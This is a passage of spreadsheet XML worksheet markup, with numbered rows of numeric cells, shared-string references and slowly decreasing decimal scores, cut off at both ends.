      <c r="A24057" s="1">
        <v>22483.0</v>
      </c>
      <c r="B24057" s="2">
        <v>3.6920514E7</v>
      </c>
      <c r="C24057" s="2" t="s">
        <v>23178</v>
      </c>
      <c r="D24057" s="2">
        <v>1.0</v>
      </c>
      <c r="E24057" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24057" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="24058" ht="15.75" customHeight="1">
      <c r="A24058" s="1">
        <v>26433.0</v>
      </c>
      <c r="B24058" s="2">
        <v>1.7197011E7</v>
      </c>
      <c r="C24058" s="2" t="s">
        <v>23020</v>
      </c>
      <c r="D24058" s="2">
        <v>1.0</v>
      </c>
      <c r="E24058" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24058" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="24059" ht="15.75" customHeight="1">
      <c r="A24059" s="1">
        <v>27359.0</v>
      </c>
      <c r="B24059" s="2">
        <v>2.1618618E7</v>
      </c>
      <c r="C24059" s="2" t="s">
        <v>23179</v>
      </c>
      <c r="D24059" s="2">
        <v>1.0</v>
      </c>
      <c r="E24059" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24059" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="24060" ht="15.75" customHeight="1">
      <c r="A24060" s="1">
        <v>32391.0</v>
      </c>
      <c r="B24060" s="2">
        <v>5621988.0</v>
      </c>
      <c r="C24060" s="2" t="s">
        <v>23180</v>
      </c>
      <c r="D24060" s="2">
        <v>1.0</v>
      </c>
      <c r="E24060" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24060" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="24061" ht="15.75" customHeight="1">
      <c r="A24061" s="1">
        <v>19645.0</v>
      </c>
      <c r="B24061" s="2">
        <v>5.6298971E7</v>
      </c>
      <c r="C24061" s="2" t="s">
        <v>23181</v>
      </c>
      <c r="D24061" s="2">
        <v>1.0</v>
      </c>
      <c r="E24061" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24061" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="24062" ht="15.75" customHeight="1">
      <c r="A24062" s="1">
        <v>23860.0</v>
      </c>
      <c r="B24062" s="2">
        <v>8298357.0</v>
      </c>
      <c r="C24062" s="2" t="s">
        <v>23182</v>
      </c>
      <c r="D24062" s="2">
        <v>1.0</v>
      </c>
      <c r="E24062" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24062" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="24063" ht="15.75" customHeight="1">
      <c r="A24063" s="1">
        <v>25152.0</v>
      </c>
      <c r="B24063" s="2">
        <v>1.3059673E7</v>
      </c>
      <c r="C24063" s="2" t="s">
        <v>23183</v>
      </c>
      <c r="D24063" s="2">
        <v>1.0</v>
      </c>
      <c r="E24063" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24063" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="24064" ht="15.75" customHeight="1">
      <c r="A24064" s="1">
        <v>30725.0</v>
      </c>
      <c r="B24064" s="2">
        <v>4.3667949E7</v>
      </c>
      <c r="C24064" s="2" t="s">
        <v>23184</v>
      </c>
      <c r="D24064" s="2">
        <v>1.0</v>
      </c>
      <c r="E24064" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24064" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="24065" ht="15.75" customHeight="1">
      <c r="A24065" s="1">
        <v>32915.0</v>
      </c>
      <c r="B24065" s="2">
        <v>6409483.0</v>
      </c>
      <c r="C24065" s="2" t="s">
        <v>23185</v>
      </c>
      <c r="D24065" s="2">
        <v>1.0</v>
      </c>
      <c r="E24065" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24065" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="24066" ht="15.75" customHeight="1">
      <c r="A24066" s="1">
        <v>19065.0</v>
      </c>
      <c r="B24066" s="2">
        <v>5.4596122E7</v>
      </c>
      <c r="C24066" s="2" t="s">
        <v>23186</v>
      </c>
      <c r="D24066" s="2">
        <v>1.0</v>
      </c>
      <c r="E24066" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24066" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="24067" ht="15.75" customHeight="1">
      <c r="A24067" s="1">
        <v>27093.0</v>
      </c>
      <c r="B24067" s="2">
        <v>2.0525661E7</v>
      </c>
      <c r="C24067" s="2" t="s">
        <v>23187</v>
      </c>
      <c r="D24067" s="2">
        <v>1.0</v>
      </c>
      <c r="E24067" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24067" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="24068" ht="15.75" customHeight="1">
      <c r="A24068" s="1">
        <v>27198.0</v>
      </c>
      <c r="B24068" s="2">
        <v>2.0931704E7</v>
      </c>
      <c r="C24068" s="2" t="s">
        <v>23188</v>
      </c>
      <c r="D24068" s="2">
        <v>1.0</v>
      </c>
      <c r="E24068" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24068" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="24069" ht="15.75" customHeight="1">
      <c r="A24069" s="1">
        <v>29080.0</v>
      </c>
      <c r="B24069" s="2">
        <v>3.0336719E7</v>
      </c>
      <c r="C24069" s="2" t="s">
        <v>23189</v>
      </c>
      <c r="D24069" s="2">
        <v>1.0</v>
      </c>
      <c r="E24069" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24069" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="24070" ht="15.75" customHeight="1">
      <c r="A24070" s="1">
        <v>15155.0</v>
      </c>
      <c r="B24070" s="2">
        <v>4.1969761E7</v>
      </c>
      <c r="C24070" s="2" t="s">
        <v>23190</v>
      </c>
      <c r="D24070" s="2">
        <v>1.0</v>
      </c>
      <c r="E24070" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24070" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="24071" ht="15.75" customHeight="1">
      <c r="A24071" s="1">
        <v>20355.0</v>
      </c>
      <c r="B24071" s="2">
        <v>1.1663105E7</v>
      </c>
      <c r="C24071" s="2" t="s">
        <v>23078</v>
      </c>
      <c r="D24071" s="2">
        <v>1.0</v>
      </c>
      <c r="E24071" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24071" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="24072" ht="15.75" customHeight="1">
      <c r="A24072" s="1">
        <v>20429.0</v>
      </c>
      <c r="B24072" s="2">
        <v>1.2327914E7</v>
      </c>
      <c r="C24072" s="2" t="s">
        <v>23136</v>
      </c>
      <c r="D24072" s="2">
        <v>1.0</v>
      </c>
      <c r="E24072" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24072" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="24073" ht="15.75" customHeight="1">
      <c r="A24073" s="1">
        <v>23566.0</v>
      </c>
      <c r="B24073" s="2">
        <v>6183772.0</v>
      </c>
      <c r="C24073" s="2" t="s">
        <v>8296</v>
      </c>
      <c r="D24073" s="2">
        <v>1.0</v>
      </c>
      <c r="E24073" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24073" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="24074" ht="15.75" customHeight="1">
      <c r="A24074" s="1">
        <v>28800.0</v>
      </c>
      <c r="B24074" s="2">
        <v>2.8629982E7</v>
      </c>
      <c r="C24074" s="2" t="s">
        <v>23191</v>
      </c>
      <c r="D24074" s="2">
        <v>1.0</v>
      </c>
      <c r="E24074" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24074" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="24075" ht="15.75" customHeight="1">
      <c r="A24075" s="1">
        <v>29249.0</v>
      </c>
      <c r="B24075" s="2">
        <v>3.0858431E7</v>
      </c>
      <c r="C24075" s="2" t="s">
        <v>23192</v>
      </c>
      <c r="D24075" s="2">
        <v>1.0</v>
      </c>
      <c r="E24075" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24075" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="24076" ht="15.75" customHeight="1">
      <c r="A24076" s="1">
        <v>29478.0</v>
      </c>
      <c r="B24076" s="2">
        <v>3.2422174E7</v>
      </c>
      <c r="C24076" s="2" t="s">
        <v>23193</v>
      </c>
      <c r="D24076" s="2">
        <v>1.0</v>
      </c>
      <c r="E24076" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24076" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="24077" ht="15.75" customHeight="1">
      <c r="A24077" s="1">
        <v>32087.0</v>
      </c>
      <c r="B24077" s="2">
        <v>5.3937787E7</v>
      </c>
      <c r="C24077" s="2" t="s">
        <v>23194</v>
      </c>
      <c r="D24077" s="2">
        <v>1.0</v>
      </c>
      <c r="E24077" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24077" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="24078" ht="15.75" customHeight="1">
      <c r="A24078" s="1">
        <v>32178.0</v>
      </c>
      <c r="B24078" s="2">
        <v>5464228.0</v>
      </c>
      <c r="C24078" s="2" t="s">
        <v>23195</v>
      </c>
      <c r="D24078" s="2">
        <v>1.0</v>
      </c>
      <c r="E24078" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24078" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="24079" ht="15.75" customHeight="1">
      <c r="A24079" s="1">
        <v>34235.0</v>
      </c>
      <c r="B24079" s="2">
        <v>4730051.0</v>
      </c>
      <c r="C24079" s="2" t="s">
        <v>23196</v>
      </c>
      <c r="D24079" s="2">
        <v>1.0</v>
      </c>
      <c r="E24079" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24079" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="24080" ht="15.75" customHeight="1">
      <c r="A24080" s="1">
        <v>9277.0</v>
      </c>
      <c r="B24080" s="2">
        <v>5.5518556E7</v>
      </c>
      <c r="C24080" s="2" t="s">
        <v>23197</v>
      </c>
      <c r="D24080" s="2">
        <v>1.0</v>
      </c>
      <c r="E24080" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24080" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="24081" ht="15.75" customHeight="1">
      <c r="A24081" s="1">
        <v>12653.0</v>
      </c>
      <c r="B24081" s="2">
        <v>3039819.0</v>
      </c>
      <c r="C24081" s="2" t="s">
        <v>23198</v>
      </c>
      <c r="D24081" s="2">
        <v>1.0</v>
      </c>
      <c r="E24081" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24081" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="24082" ht="15.75" customHeight="1">
      <c r="A24082" s="1">
        <v>22385.0</v>
      </c>
      <c r="B24082" s="2">
        <v>3.5277637E7</v>
      </c>
      <c r="C24082" s="2" t="s">
        <v>23199</v>
      </c>
      <c r="D24082" s="2">
        <v>1.0</v>
      </c>
      <c r="E24082" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24082" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="24083" ht="15.75" customHeight="1">
      <c r="A24083" s="1">
        <v>24685.0</v>
      </c>
      <c r="B24083" s="2">
        <v>1.1611369E7</v>
      </c>
      <c r="C24083" s="2" t="s">
        <v>23200</v>
      </c>
      <c r="D24083" s="2">
        <v>1.0</v>
      </c>
      <c r="E24083" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24083" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="24084" ht="15.75" customHeight="1">
      <c r="A24084" s="1">
        <v>26136.0</v>
      </c>
      <c r="B24084" s="2">
        <v>1.6027583E7</v>
      </c>
      <c r="C24084" s="2" t="s">
        <v>23201</v>
      </c>
      <c r="D24084" s="2">
        <v>1.0</v>
      </c>
      <c r="E24084" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24084" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="24085" ht="15.75" customHeight="1">
      <c r="A24085" s="1">
        <v>28817.0</v>
      </c>
      <c r="B24085" s="2">
        <v>2.8770794E7</v>
      </c>
      <c r="C24085" s="2" t="s">
        <v>23202</v>
      </c>
      <c r="D24085" s="2">
        <v>1.0</v>
      </c>
      <c r="E24085" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24085" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="24086" ht="15.75" customHeight="1">
      <c r="A24086" s="1">
        <v>29419.0</v>
      </c>
      <c r="B24086" s="2">
        <v>3.2184001E7</v>
      </c>
      <c r="C24086" s="2" t="s">
        <v>23203</v>
      </c>
      <c r="D24086" s="2">
        <v>1.0</v>
      </c>
      <c r="E24086" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24086" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="24087" ht="15.75" customHeight="1">
      <c r="A24087" s="1">
        <v>11672.0</v>
      </c>
      <c r="B24087" s="2">
        <v>2.3380584E7</v>
      </c>
      <c r="C24087" s="2" t="s">
        <v>23204</v>
      </c>
      <c r="D24087" s="2">
        <v>1.0</v>
      </c>
      <c r="E24087" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24087" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="24088" ht="15.75" customHeight="1">
      <c r="A24088" s="1">
        <v>14053.0</v>
      </c>
      <c r="B24088" s="2">
        <v>3.7530513E7</v>
      </c>
      <c r="C24088" s="2" t="s">
        <v>23205</v>
      </c>
      <c r="D24088" s="2">
        <v>1.0</v>
      </c>
      <c r="E24088" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24088" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="24089" ht="15.75" customHeight="1">
      <c r="A24089" s="1">
        <v>16266.0</v>
      </c>
      <c r="B24089" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C24089" s="2" t="s">
        <v>23206</v>
      </c>
      <c r="D24089" s="2">
        <v>1.0</v>
      </c>
      <c r="E24089" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24089" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="24090" ht="15.75" customHeight="1">
      <c r="A24090" s="1">
        <v>17808.0</v>
      </c>
      <c r="B24090" s="2">
        <v>5.0843632E7</v>
      </c>
      <c r="C24090" s="2" t="s">
        <v>23207</v>
      </c>
      <c r="D24090" s="2">
        <v>1.0</v>
      </c>
      <c r="E24090" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24090" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="24091" ht="15.75" customHeight="1">
      <c r="A24091" s="1">
        <v>20343.0</v>
      </c>
      <c r="B24091" s="2">
        <v>1.161137E7</v>
      </c>
      <c r="C24091" s="2" t="s">
        <v>23200</v>
      </c>
      <c r="D24091" s="2">
        <v>1.0</v>
      </c>
      <c r="E24091" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24091" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="24092" ht="15.75" customHeight="1">
      <c r="A24092" s="1">
        <v>23652.0</v>
      </c>
      <c r="B24092" s="2">
        <v>6795881.0</v>
      </c>
      <c r="C24092" s="2" t="s">
        <v>23208</v>
      </c>
      <c r="D24092" s="2">
        <v>1.0</v>
      </c>
      <c r="E24092" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24092" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="24093" ht="15.75" customHeight="1">
      <c r="A24093" s="1">
        <v>27017.0</v>
      </c>
      <c r="B24093" s="2">
        <v>2.0025906E7</v>
      </c>
      <c r="C24093" s="2" t="s">
        <v>23209</v>
      </c>
      <c r="D24093" s="2">
        <v>1.0</v>
      </c>
      <c r="E24093" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24093" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="24094" ht="15.75" customHeight="1">
      <c r="A24094" s="1">
        <v>29355.0</v>
      </c>
      <c r="B24094" s="2">
        <v>3.1597529E7</v>
      </c>
      <c r="C24094" s="2" t="s">
        <v>23210</v>
      </c>
      <c r="D24094" s="2">
        <v>1.0</v>
      </c>
      <c r="E24094" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24094" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="24095" ht="15.75" customHeight="1">
      <c r="A24095" s="1">
        <v>31101.0</v>
      </c>
      <c r="B24095" s="2">
        <v>4.8555323E7</v>
      </c>
      <c r="C24095" s="2" t="s">
        <v>23211</v>
      </c>
      <c r="D24095" s="2">
        <v>1.0</v>
      </c>
      <c r="E24095" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24095" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="24096" ht="15.75" customHeight="1">
      <c r="A24096" s="1">
        <v>22824.0</v>
      </c>
      <c r="B24096" s="2">
        <v>4636274.0</v>
      </c>
      <c r="C24096" s="2" t="s">
        <v>11818</v>
      </c>
      <c r="D24096" s="2">
        <v>1.0</v>
      </c>
      <c r="E24096" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24096" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="24097" ht="15.75" customHeight="1">
      <c r="A24097" s="1">
        <v>25086.0</v>
      </c>
      <c r="B24097" s="2">
        <v>1.28818E7</v>
      </c>
      <c r="C24097" s="2" t="s">
        <v>23212</v>
      </c>
      <c r="D24097" s="2">
        <v>1.0</v>
      </c>
      <c r="E24097" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24097" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="24098" ht="15.75" customHeight="1">
      <c r="A24098" s="1">
        <v>3295.0</v>
      </c>
      <c r="B24098" s="2">
        <v>3.7525206E7</v>
      </c>
      <c r="C24098" s="2" t="s">
        <v>23213</v>
      </c>
      <c r="D24098" s="2">
        <v>1.0</v>
      </c>
      <c r="E24098" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24098" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="24099" ht="15.75" customHeight="1">
      <c r="A24099" s="1">
        <v>6.0</v>
      </c>
      <c r="B24099" s="2">
        <v>1017005.0</v>
      </c>
      <c r="C24099" s="2" t="s">
        <v>23214</v>
      </c>
      <c r="D24099" s="2">
        <v>1.0</v>
      </c>
      <c r="E24099" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24099" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24100" ht="15.75" customHeight="1">
      <c r="A24100" s="1">
        <v>4835.0</v>
      </c>
      <c r="B24100" s="2">
        <v>4.3673133E7</v>
      </c>
      <c r="C24100" s="2" t="s">
        <v>23215</v>
      </c>
      <c r="D24100" s="2">
        <v>1.0</v>
      </c>
      <c r="E24100" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24100" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24101" ht="15.75" customHeight="1">
      <c r="A24101" s="1">
        <v>7583.0</v>
      </c>
      <c r="B24101" s="2">
        <v>5.1593591E7</v>
      </c>
      <c r="C24101" s="2" t="s">
        <v>23216</v>
      </c>
      <c r="D24101" s="2">
        <v>1.0</v>
      </c>
      <c r="E24101" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24101" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24102" ht="15.75" customHeight="1">
      <c r="A24102" s="1">
        <v>10354.0</v>
      </c>
      <c r="B24102" s="2">
        <v>7237593.0</v>
      </c>
      <c r="C24102" s="2" t="s">
        <v>23217</v>
      </c>
      <c r="D24102" s="2">
        <v>1.0</v>
      </c>
      <c r="E24102" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24102" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24103" ht="15.75" customHeight="1">
      <c r="A24103" s="1">
        <v>14078.0</v>
      </c>
      <c r="B24103" s="2">
        <v>3.7673431E7</v>
      </c>
      <c r="C24103" s="2" t="s">
        <v>23218</v>
      </c>
      <c r="D24103" s="2">
        <v>1.0</v>
      </c>
      <c r="E24103" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24103" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24104" ht="15.75" customHeight="1">
      <c r="A24104" s="1">
        <v>15213.0</v>
      </c>
      <c r="B24104" s="2">
        <v>4.2145884E7</v>
      </c>
      <c r="C24104" s="2" t="s">
        <v>23219</v>
      </c>
      <c r="D24104" s="2">
        <v>1.0</v>
      </c>
      <c r="E24104" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24104" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24105" ht="15.75" customHeight="1">
      <c r="A24105" s="1">
        <v>17518.0</v>
      </c>
      <c r="B24105" s="2">
        <v>5.0054371E7</v>
      </c>
      <c r="C24105" s="2" t="s">
        <v>23220</v>
      </c>
      <c r="D24105" s="2">
        <v>1.0</v>
      </c>
      <c r="E24105" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24105" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24106" ht="15.75" customHeight="1">
      <c r="A24106" s="1">
        <v>20033.0</v>
      </c>
      <c r="B24106" s="2">
        <v>727836.0</v>
      </c>
      <c r="C24106" s="2" t="s">
        <v>23221</v>
      </c>
      <c r="D24106" s="2">
        <v>1.0</v>
      </c>
      <c r="E24106" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24106" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24107" ht="15.75" customHeight="1">
      <c r="A24107" s="1">
        <v>20151.0</v>
      </c>
      <c r="B24107" s="2">
        <v>1.0204284E7</v>
      </c>
      <c r="C24107" s="2" t="s">
        <v>23222</v>
      </c>
      <c r="D24107" s="2">
        <v>1.0</v>
      </c>
      <c r="E24107" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24107" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24108" ht="15.75" customHeight="1">
      <c r="A24108" s="1">
        <v>20458.0</v>
      </c>
      <c r="B24108" s="2">
        <v>1.2676986E7</v>
      </c>
      <c r="C24108" s="2" t="s">
        <v>23223</v>
      </c>
      <c r="D24108" s="2">
        <v>1.0</v>
      </c>
      <c r="E24108" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24108" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24109" ht="15.75" customHeight="1">
      <c r="A24109" s="1">
        <v>21137.0</v>
      </c>
      <c r="B24109" s="2">
        <v>1.8506298E7</v>
      </c>
      <c r="C24109" s="2" t="s">
        <v>23224</v>
      </c>
      <c r="D24109" s="2">
        <v>1.0</v>
      </c>
      <c r="E24109" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24109" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24110" ht="15.75" customHeight="1">
      <c r="A24110" s="1">
        <v>22198.0</v>
      </c>
      <c r="B24110" s="2">
        <v>3.191426E7</v>
      </c>
      <c r="C24110" s="2" t="s">
        <v>23225</v>
      </c>
      <c r="D24110" s="2">
        <v>1.0</v>
      </c>
      <c r="E24110" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24110" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24111" ht="15.75" customHeight="1">
      <c r="A24111" s="1">
        <v>22240.0</v>
      </c>
      <c r="B24111" s="2">
        <v>3.2637335E7</v>
      </c>
      <c r="C24111" s="2" t="s">
        <v>23226</v>
      </c>
      <c r="D24111" s="2">
        <v>1.0</v>
      </c>
      <c r="E24111" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24111" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24112" ht="15.75" customHeight="1">
      <c r="A24112" s="1">
        <v>22380.0</v>
      </c>
      <c r="B24112" s="2">
        <v>3.5117383E7</v>
      </c>
      <c r="C24112" s="2" t="s">
        <v>23227</v>
      </c>
      <c r="D24112" s="2">
        <v>1.0</v>
      </c>
      <c r="E24112" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24112" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24113" ht="15.75" customHeight="1">
      <c r="A24113" s="1">
        <v>23304.0</v>
      </c>
      <c r="B24113" s="2">
        <v>5409253.0</v>
      </c>
      <c r="C24113" s="2" t="s">
        <v>23228</v>
      </c>
      <c r="D24113" s="2">
        <v>1.0</v>
      </c>
      <c r="E24113" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24113" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24114" ht="15.75" customHeight="1">
      <c r="A24114" s="1">
        <v>23742.0</v>
      </c>
      <c r="B24114" s="2">
        <v>7369438.0</v>
      </c>
      <c r="C24114" s="2" t="s">
        <v>23229</v>
      </c>
      <c r="D24114" s="2">
        <v>1.0</v>
      </c>
      <c r="E24114" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24114" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24115" ht="15.75" customHeight="1">
      <c r="A24115" s="1">
        <v>26127.0</v>
      </c>
      <c r="B24115" s="2">
        <v>1.5922622E7</v>
      </c>
      <c r="C24115" s="2" t="s">
        <v>23230</v>
      </c>
      <c r="D24115" s="2">
        <v>1.0</v>
      </c>
      <c r="E24115" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24115" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24116" ht="15.75" customHeight="1">
      <c r="A24116" s="1">
        <v>27078.0</v>
      </c>
      <c r="B24116" s="2">
        <v>2.0459132E7</v>
      </c>
      <c r="C24116" s="2" t="s">
        <v>23231</v>
      </c>
      <c r="D24116" s="2">
        <v>1.0</v>
      </c>
      <c r="E24116" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24116" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24117" ht="15.75" customHeight="1">
      <c r="A24117" s="1">
        <v>27752.0</v>
      </c>
      <c r="B24117" s="2">
        <v>2.3102279E7</v>
      </c>
      <c r="C24117" s="2" t="s">
        <v>23232</v>
      </c>
      <c r="D24117" s="2">
        <v>1.0</v>
      </c>
      <c r="E24117" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24117" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24118" ht="15.75" customHeight="1">
      <c r="A24118" s="1">
        <v>28377.0</v>
      </c>
      <c r="B24118" s="2">
        <v>2.6105639E7</v>
      </c>
      <c r="C24118" s="2" t="s">
        <v>23233</v>
      </c>
      <c r="D24118" s="2">
        <v>1.0</v>
      </c>
      <c r="E24118" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24118" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24119" ht="15.75" customHeight="1">
      <c r="A24119" s="1">
        <v>30827.0</v>
      </c>
      <c r="B24119" s="2">
        <v>4541322.0</v>
      </c>
      <c r="C24119" s="2" t="s">
        <v>23234</v>
      </c>
      <c r="D24119" s="2">
        <v>1.0</v>
      </c>
      <c r="E24119" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24119" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24120" ht="15.75" customHeight="1">
      <c r="A24120" s="1">
        <v>32683.0</v>
      </c>
      <c r="B24120" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C24120" s="2" t="s">
        <v>23235</v>
      </c>
      <c r="D24120" s="2">
        <v>1.0</v>
      </c>
      <c r="E24120" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24120" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="24121" ht="15.75" customHeight="1">
      <c r="A24121" s="1">
        <v>32636.0</v>
      </c>
      <c r="B24121" s="2">
        <v>5857361.0</v>
      </c>
      <c r="C24121" s="2" t="s">
        <v>23236</v>
      </c>
      <c r="D24121" s="2">
        <v>1.0</v>
      </c>
      <c r="E24121" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24121" s="2">
        <v>0.1184640522875818</v>
      </c>
    </row>
    <row r="24122" ht="15.75" customHeight="1">
      <c r="A24122" s="1">
        <v>20742.0</v>
      </c>
      <c r="B24122" s="2">
        <v>1.4769432E7</v>
      </c>
      <c r="C24122" s="2" t="s">
        <v>23237</v>
      </c>
      <c r="D24122" s="2">
        <v>1.0</v>
      </c>
      <c r="E24122" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24122" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="24123" ht="15.75" customHeight="1">
      <c r="A24123" s="1">
        <v>21435.0</v>
      </c>
      <c r="B24123" s="2">
        <v>2.2189248E7</v>
      </c>
      <c r="C24123" s="2" t="s">
        <v>23238</v>
      </c>
      <c r="D24123" s="2">
        <v>1.0</v>
      </c>
      <c r="E24123" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24123" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="24124" ht="15.75" customHeight="1">
      <c r="A24124" s="1">
        <v>31167.0</v>
      </c>
